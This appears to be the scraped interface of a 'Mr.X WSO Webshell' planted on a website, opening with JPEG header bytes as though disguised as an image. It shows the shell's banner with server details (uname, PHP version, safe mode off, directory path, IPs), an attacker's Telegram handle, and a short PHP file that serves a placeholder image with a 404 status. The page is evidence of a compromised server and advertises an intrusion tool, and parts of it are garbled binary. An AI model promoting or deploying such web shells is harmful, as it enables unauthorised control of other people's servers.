����JFIF���������
| Attention: Uname: Php: Hdd: Cwd: | Mr.X WSO Webshell! - Personal WEB SHELL Mr.X BYPASS! V2.5 Telegram: @jackleet 5.3.29 Safe mode: OFF Datetime: 2026-04-09 18:39:46 1999.30 GB Free: 68.57 GB (3%) /home/httpd/html/stoptube.com/ drwxr-xr-x [ root ] [ home ] Text | Server IP: 127.0.0.54 Client IP: 216.73.216.53 |
| [ Files ] | [ Logout ] |
|---|
<?php
$file = $_SERVER['DOCUMENT_ROOT'] . '/core/images/placeholder.jpg';
$type = 'image/jpeg';
$filesize = filesize($file);
header("HTTP/1.0 404 Not Found");
header("Content-Type: $type");
header("Content-Length: $filesize");
readfile($file);